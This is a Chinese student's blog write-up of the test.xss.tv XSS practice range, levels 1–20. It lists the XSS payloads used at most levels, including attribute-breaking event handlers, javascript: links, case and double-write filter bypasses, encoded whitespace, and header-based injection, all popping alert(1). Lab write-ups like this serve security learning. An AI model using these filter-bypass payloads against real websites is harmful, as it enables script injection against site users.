test.xss.tv

集训第二周 星期一(下)

下午接着XSS,先放靶场
http://test.xss.tv/level1.php?name=test

level 1

这一题也没什么,主要就是找到注入点,让name等于test23,看下页面源码,发现只有一个地方出现了我们输入得东西。在这里插入图片描述于是我们构造payload

<script>alert(1)</script>

level 2

这个我就极其得不理解,到底编码之后还能不能用了,上午写得那个可以用,到下午,这个就不行了。晕,不知道等以后学了JavaScript和HTML之后,会不会明白。在这里插入图片描述它这个是在这里注入的,下面这个,不是上面那个图。

<input name=keyword  value="test23<img>">

我们构造payload:来闭合前前面的标签。

"><img src="x" onerror="alert(1)">

level 3

这一关过滤了"<",>,"。它既然敢过滤,那我们就敢不用。换一个姿势:onmousedown,它是一个事件,当 某个鼠标按键被按下时触发,我们就让它等于JavaScript代码。前面的单引号闭合前面的,后面的同理。记得点一下输入框。

' onmousedown='alert(1)

level 4

和上一关一样,只不过换成了双引号

" onmousedown="alert(1)

level 5

这一关过滤了所有on事件,那我们就再换个姿势:JavaScript:alert(1),照样可以执行JavaScript代码,只不过这个好像是一关个链接的形式出现的,所以我们要加一个标签。

"><a href="javascript:alert(1)">

level 6

这一关,再上一关的基础上,又把href给过滤了,问题不大。它没有匹配大小写,我们用hREf绕过。

"><a hREf="javascript:alert(1)">

level 7

过滤了href和script。但是都只是过滤了一次,所以我们双写就可以了

"><a hrehreff =javasscriptcript:alert(1);>

level 8

把关键字给过滤了,加上了空格,但是我们可以用%0a来制造空格,来绕过。我以前我记得是用的&#ASCLL来绕过的,但不知道为什么突然就不行了。

javascrip&#x74;:alert(1)

level 9

看了别人的答案,才知道必须包含http://这几个字符,让后JavaScript关键字照样过滤掉了,还是用url编码绕过。

javascr%09ipt:alert(`http://`)

level 10

这一关啥都没有,这咋写,没有办法,只能看了看别人的payload,他们竟然有源码。他们说胡务器出来接受一个keyword还接受了一个“t_sort”,这谁顶的住。不看源码这谁知道。反正就是给“t_sort”也传一个值,生成一个文本框,让后再创建条件。

keyword=well%20done!&t_sort=" type="text" onmousedown="alert(1)

level 11~13

他们三个都差不多,只不过注入的地方不一样,第一个是referer,第二个是user-agent,第三个是cookie,然后方式可10差不多,好像一模一样。

keyword=well%20done!&t_sort=" type="text" onmousedown="alert(1)

level 14~15

不会写,14好像这一关有问题。下一关下一关。

level 16

把空格过滤了,用%0a绕过就行了

<img%0asrc="x"%0aonerror="alert(1);">

level 17~18

大佬们写的好像比我的简单,但思路都是构造事件,让后触发

arg01= onmousemove&arg02=alert(1)

level 19~20

不会了。
可算是写完了,写了两个靶场,感觉对XSS也算是有了一个大致的了解吧,未来的路,任重而道远。不仅的再学学如何发现XSS还的学习一下如何利用。我也大概去了解了一下,发现,XSS要是想盗cookie,不仅只靠XSS,还得学CSRF。我的小心脏啊,还的学这么多东西。come on,来吧!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值